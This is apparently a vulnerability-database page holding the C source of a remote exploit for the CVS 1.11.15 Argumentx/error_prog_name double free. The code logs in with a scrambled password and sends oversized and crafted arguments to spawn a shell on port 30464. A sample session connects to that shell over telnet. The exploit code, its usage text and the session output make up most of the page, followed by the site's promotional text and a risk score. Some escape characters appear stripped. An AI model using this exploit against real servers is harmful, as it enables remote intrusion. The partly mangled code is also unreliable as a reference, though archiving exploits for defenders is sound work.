&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195,&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152&nbsp;};&nbsp;

char&nbsp;&nbsp;&nbsp;*scramble(char&nbsp;*&nbsp;str)&nbsp;
{&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;int&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;i;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;char&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;*&nbsp;s;&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;s&nbsp;=&nbsp;(char&nbsp;*)&nbsp;malloc&nbsp;(strlen&nbsp;(str)&nbsp;+&nbsp;3);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;memset(s,&nbsp;'',&nbsp;strlen(str)&nbsp;+&nbsp;3);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;*s&nbsp;=&nbsp;'A';&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;for&nbsp;(i&nbsp;=&nbsp;1;&nbsp;str[i&nbsp;-&nbsp;1];&nbsp;i++)&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;s&nbsp;=&nbsp;shifts[(unsigned&nbsp;char)(str[i&nbsp;-&nbsp;1])];&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;(s);&nbsp;
}&nbsp;

#define&nbsp;LOGIN&nbsp;&quot;BEGIN&nbsp;AUTH&nbsp;REQUESTn/home/cvsrootn%sn%snEND&nbsp;AUTH&nbsp;
REQUESTn&quot;&nbsp;
#define&nbsp;REQUEST&nbsp;&quot;Root&nbsp;%sn&quot;&nbsp;

void&nbsp;login(char&nbsp;*login,&nbsp;char&nbsp;*password,&nbsp;char&nbsp;*repo)&nbsp;
{&nbsp;
char&nbsp;*buf,&nbsp;*ptr,&nbsp;reply[1024];&nbsp;
char&nbsp;*rep,&nbsp;*rp;&nbsp;
buf&nbsp;=&nbsp;(char&nbsp;*)malloc(1024);&nbsp;
rep&nbsp;=&nbsp;(char&nbsp;*)malloc(512);&nbsp;

ptr&nbsp;=&nbsp;buf;&nbsp;
rp&nbsp;=&nbsp;rep;&nbsp;
sprintf(ptr,&nbsp;LOGIN,&nbsp;login,&nbsp;scramble(password));&nbsp;
sprintf(rp,&nbsp;REQUEST,&nbsp;repo);&nbsp;

ptr&nbsp;=&nbsp;buf;&nbsp;

xp_write(ptr);&nbsp;/*&nbsp;login&nbsp;request&nbsp;*/&nbsp;
xp_receive();&nbsp;
xp_write(rp);&nbsp;/*&nbsp;root&nbsp;dir&nbsp;request&nbsp;*/&nbsp;


}&nbsp;

char&nbsp;argumentx[]&nbsp;=&nbsp;&quot;Argumentx&nbsp;%sn&quot;;&nbsp;
char&nbsp;argument[]&nbsp;=&nbsp;&nbsp;&nbsp;&quot;Argument&nbsp;%sn&quot;;&nbsp;
char&nbsp;trash[]&nbsp;=&nbsp;&quot;FCUK&quot;;&nbsp;
char&nbsp;str[]&nbsp;=&nbsp;&quot;Argument&nbsp;x42x42x42x42x6exffxffxffx1cxfcxffxff&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&quot;xf0xffxffxffx41x41n&quot;;&nbsp;

void&nbsp;overflow()&nbsp;
{&nbsp;
&nbsp;&nbsp;char&nbsp;*data,&nbsp;*dptr,&nbsp;*buf,&nbsp;*bufp,&nbsp;*eg,&nbsp;*arg,&nbsp;*aptr;&nbsp;
int&nbsp;i;&nbsp;
data&nbsp;=&nbsp;(char&nbsp;*)malloc(111111);&nbsp;
dptr&nbsp;=&nbsp;data;&nbsp;
buf&nbsp;=&nbsp;(char&nbsp;*)malloc(111111+20);&nbsp;
bufp&nbsp;=&nbsp;buf;&nbsp;
arg&nbsp;=&nbsp;(char&nbsp;*)malloc(1500);&nbsp;
aptr&nbsp;=&nbsp;arg;&nbsp;


memset(dptr,&nbsp;'x41',&nbsp;111111);&nbsp;
sprintf(bufp,&nbsp;argumentx,&nbsp;data);&nbsp;
xp_write(bufp);&nbsp;

eg&nbsp;=&nbsp;egg(0x80d2b4a,&nbsp;0x080cda20);&nbsp;
sprintf(aptr,&nbsp;argument,&nbsp;eg);&nbsp;

for&nbsp;(i=0&nbsp;;&nbsp;i&lt;50;&nbsp;i++)&nbsp;
xp_write(aptr);&nbsp;

xp_write(str);&nbsp;
xp_write(trash);&nbsp;
}&nbsp;



void&nbsp;usage(char&nbsp;*name)&nbsp;
{&nbsp;
printf(&quot;CVS&nbsp;&lt;=&nbsp;1.11.15&nbsp;Argumentx&nbsp;double&nbsp;free()&nbsp;remote&nbsp;exploit&nbsp;by&nbsp;Gyan&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;Chawdhary&nbsp;([email protected])n&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;Usage:&nbsp;%s&nbsp;&lt;options&gt;n&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;-i&nbsp;&lt;target&nbsp;IP&nbsp;address&gt;n&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;-l&nbsp;&lt;login&gt;n&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;-p&nbsp;&lt;password&gt;n&quot;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&quot;-r&nbsp;&lt;repository&nbsp;path&gt;nn&quot;,&nbsp;name);&nbsp;
}&nbsp;



main(int&nbsp;argc,&nbsp;char&nbsp;**argv)&nbsp;
{&nbsp;
int&nbsp;c;&nbsp;
char&nbsp;ip[16],&nbsp;user[32],&nbsp;pass[32],&nbsp;rep[512];&nbsp;

ip[0]&nbsp;=&nbsp;0;&nbsp;
user[0]&nbsp;=&nbsp;0;&nbsp;
pass[0]&nbsp;=&nbsp;0;&nbsp;
rep[0]&nbsp;=&nbsp;0;&nbsp;

if&nbsp;(argc&nbsp;&lt;&nbsp;2)&nbsp;{&nbsp;
usage(argv[0]);&nbsp;
exit(0);&nbsp;
}&nbsp;

while&nbsp;((c&nbsp;=&nbsp;getopt(argc,&nbsp;argv,&nbsp;&quot;h::l:p:i:r:&quot;))&nbsp;!=&nbsp;-1)&nbsp;{&nbsp;

switch(c)&nbsp;{&nbsp;

case&nbsp;'h':&nbsp;
usage(argv[0]);&nbsp;
exit(0);&nbsp;
case&nbsp;'i':&nbsp;
strncpy(ip,&nbsp;optarg,&nbsp;sizeof(ip));&nbsp;
break;&nbsp;
case&nbsp;'l':&nbsp;
strncpy(user,&nbsp;optarg,&nbsp;sizeof(user));&nbsp;
break;&nbsp;
case&nbsp;'p':&nbsp;
strncpy(pass,&nbsp;optarg,&nbsp;sizeof(pass));&nbsp;
break;&nbsp;
case&nbsp;'r':&nbsp;
strncpy(rep,&nbsp;optarg,&nbsp;sizeof(rep));&nbsp;
break;&nbsp;
}&nbsp;
}&nbsp;

if(ip)&nbsp;{&nbsp;
printf(&quot;Connecting&nbsp;to&nbsp;vulnerable&nbsp;CVS&nbsp;server&nbsp;...&quot;);&nbsp;
xp_connect(ip);&nbsp;
printf(&quot;OKn&quot;);&nbsp;
}&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Logging&nbsp;in&nbsp;...&quot;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;login(user,&nbsp;pass,&nbsp;rep);&nbsp;
printf(&quot;OKn&quot;);&nbsp;

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;Exploiting&nbsp;the&nbsp;CVS&nbsp;error_prog_name&nbsp;double&nbsp;free&nbsp;now&nbsp;...&quot;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;overflow();&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;DONEn&quot;);&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;printf(&quot;If&nbsp;everything&nbsp;went&nbsp;well&nbsp;there&nbsp;should&nbsp;be&nbsp;a&nbsp;shell&nbsp;on&nbsp;port&nbsp;
30464n&quot;);&nbsp;
}&nbsp;





//xp_connect(&quot;127.0.0.1&quot;);&nbsp;
//sleep(20);&nbsp;
//login(&quot;gyan&quot;,&nbsp;&quot;gyan&quot;);&nbsp;
//overflow(shellcode);&nbsp;

/*&nbsp;

[root@ill&nbsp;crazy]#&nbsp;./free&nbsp;-i&nbsp;127.0.0.1&nbsp;-l&nbsp;gyan&nbsp;-p&nbsp;gyan&nbsp;-r&nbsp;/home/cvsroot&nbsp;
Connecting&nbsp;to&nbsp;vulnerable&nbsp;CVS&nbsp;server&nbsp;...OK&nbsp;
Logging&nbsp;in&nbsp;...I&nbsp;LOVE&nbsp;YOU&nbsp;
OK&nbsp;
Exploiting&nbsp;the&nbsp;CVS&nbsp;error_prog_name&nbsp;double&nbsp;free&nbsp;now&nbsp;...DONE&nbsp;
If&nbsp;everything&nbsp;went&nbsp;well&nbsp;there&nbsp;should&nbsp;be&nbsp;a&nbsp;shell&nbsp;on&nbsp;port&nbsp;30464&nbsp;
[root@ill&nbsp;crazy]#&nbsp;telnet&nbsp;127.0.0.1&nbsp;30464&nbsp;
Trying&nbsp;127.0.0.1...&nbsp;
Connected&nbsp;to&nbsp;localhost.localdomain&nbsp;(127.0.0.1).&nbsp;
Escape&nbsp;character&nbsp;is&nbsp;'^]'.&nbsp;

*/&nbsp;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Jun 2008 00:00Current
7.1High risk
Vulners AI Score7.1
remote exploitcvs 1.11.15error_prog_namedouble free vulnerabilityserve_argumentx function
37